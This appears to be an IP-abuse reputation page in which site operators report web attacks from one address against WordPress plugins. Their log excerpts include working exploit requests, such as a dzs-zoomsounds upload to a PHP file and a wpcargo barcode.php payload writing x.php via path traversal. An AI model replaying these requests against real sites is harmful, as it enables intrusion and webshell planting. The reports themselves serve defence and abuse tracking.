๐ฌ๐ง
preissler.co.uk
2023-03-17 07:53:30
(3 years ago)
Web scanning
Web App Attack
๐จ๐ญ
backslash
2023-03-14 08:30:28
(3 years ago)
Tried to upload PHP/Kryptik.AB to Wordpress-Plugin-URLs
Exploited Host
๐บ๐ธ
gu-alvareza
2023-03-14 08:26:35
(3 years ago)
WordPress.Cherry.Plugin.import-export.Arbitrary.File.Upload
Hacking
๐ฉ๐ช
niceshops.com
2023-03-14 04:23:30
(3 years ago)
Web Attack ([14/Mar/2023:05:23:28.109] GET ///wp-content/plugins/dzs-zoomsounds/savepng.php?location ...
show more
Web Attack ([14/Mar/2023:05:23:28.109] GET ///wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php)
show less
Web App Attack
Anonymous
2023-03-14 04:14:47
(3 years ago)
Malicious File Upload in file: userfile=a57bze8931.php
Hacking
๐บ๐ฆ
URAN Publishing Service
2023-03-14 01:11:53
(3 years ago)
5.161.127.136 - - [14/Mar/2023:03:11:51 +0200] "POST //wp-content/plugins/dzs-zoomsounds/savepng.php ...
show more
5.161.127.136 - - [14/Mar/2023:03:11:51 +0200] "POST //wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php HTTP/1.1" 404 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
5.161.127.136 - - [14/Mar/2023:03:11:52 +0200] "GET //wp-content/plugins/dzs-zoomsounds/a57bze8931.php HTTP/1.1" 404 270 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
...
show less
Web App Attack
๐ฆ๐บ
paulshipley.com.au
2023-03-14 00:26:44
(3 years ago)
levellapromotions.com.au:443 5.161.127.136 - - [14/Mar/2023:11:26:22 +1100] "GET /wp-content/plugins ...
show more
levellapromotions.com.au:443 5.161.127.136 - - [14/Mar/2023:11:26:22 +1100] "GET /wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php HTTP/1.1" 403 5633 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
levellapromotions.com.au:443 5.161.127.136 - - [14/Mar/2023:11:26:24 +1100] "GET /wp-content/plugins/dzs-zoomsounds/a57bze8931.php HTTP/1.1" 403 5633 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
levellapromotions.com.au:443 5.161.127.136 - - [14/Mar/2023:11:26:26 +1100] "GET /wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd HTTP/1.1" 403 5633 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
lev
...
show less
Web App Attack
๐บ๐ธ
dtorrer
2023-03-14 00:10:03
(3 years ago)
This client attempted to login to an administrator account on a Website, or abused from another reso ...
show more
This client attempted to login to an administrator account on a Website, or abused from another resource.
show less
Brute-Force
Web App Attack
๐ฉ๐ช
ut-addicted.com
2023-03-13 22:18:22
(3 years ago)
\[Mon Mar 13 23:18:21.726084 2023\] \[:error\] \[pid 26209:tid 140264976860928\] \[client 5.161.127. ...
show more
\[Mon Mar 13 23:18:21.726084 2023\] \[:error\] \[pid 26209:tid 140264976860928\] \[client 5.161.127.136:61944\] \[client 5.161.127.136\] ModSecurity: Access denied with code 403 \(phase 2\). Operator GE matched 5 at TX:anomaly_score. \[file "/usr/local/apache/modsecurity-owasp-latest/rules/REQUEST-949-BLOCKING-EVALUATION.conf"\] \[line "57"\] \[id "949110"\] \[msg "Inbound Anomaly Score Exceeded \(Total Score: 5\)"\] \[severity "CRITICAL"\] \[tag "application-multi"\] \[tag "language-multi"\] \[tag "platform-multi"\] \[tag "attack-generic"\] \[hostname "www.ut-addicted.com"\] \[uri "/wp-content/plugins/ioptimizations/IOptimizes.php"\] \[unique_id "ZA@hLcOjPgENGg94xEsATQAAANM"\], referer: www.google.com
show less
Brute-Force
Web App Attack
๐ช๐ช
Unwasted
2023-03-13 21:35:20
(3 years ago)
Abusive content scan (abuse_score:>80)
Hacking
Brute-Force
Web App Attack
๐ฉ๐ช
Kreapptivo
2023-03-13 21:20:48
(3 years ago)
[13/Mar/2023:22:20:48 +0100] Web-Request: "POST /wp-content/plugins/apikey/apikey.php", User-Agent: ...
show more
[13/Mar/2023:22:20:48 +0100] Web-Request: "POST /wp-content/plugins/apikey/apikey.php", User-Agent: "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
show less
Bad Web Bot
Web App Attack
๐ต๐น
joaops
2023-03-13 20:33:57
(3 years ago)
[Aegis] @ 2023-03-13 20:33:47 0000 -> Common web attack.
Web Spam
Bad Web Bot
Web App Attack
๐ณ๐ฑ
tmiland
2023-03-13 18:20:26
(3 years ago)
(wordpress_404) WordPress Plugins Honeypot Trap 5.161.127.136 (US/United States/static.136.127.161.5 ...
show more
(wordpress_404) WordPress Plugins Honeypot Trap 5.161.127.136 (US/United States/static.136.127.161.5.clients.your-server.de): 2 in the last 3600 secs
show less
Blog Spam
Brute-Force
Web App Attack
Anonymous
2023-03-13 14:41:21
(3 years ago)
(mod_security) mod_security (id:1010101) triggered by 5.161.127.136 (US/United States/static.136.127 ...
show more
(mod_security) mod_security (id:1010101) triggered by 5.161.127.136 (US/United States/static.136.127.161.5.clients.your-server.de): 5 in the last 3600 secs
show less
Web App Attack
๐ง๐ท
AC - Team
2023-03-13 14:07:46
(3 years ago)
5.161.127.136 - - [13/Mar/2023:11:07:46 -0300] "GET /wp-content/plugins/wpcargo/includes/barcode.php ...
show more
5.161.127.136 - - [13/Mar/2023:11:07:46 -0300] "GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php HTTP/1.1" 307 1233 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
...
show less
Hacking
Web App Attack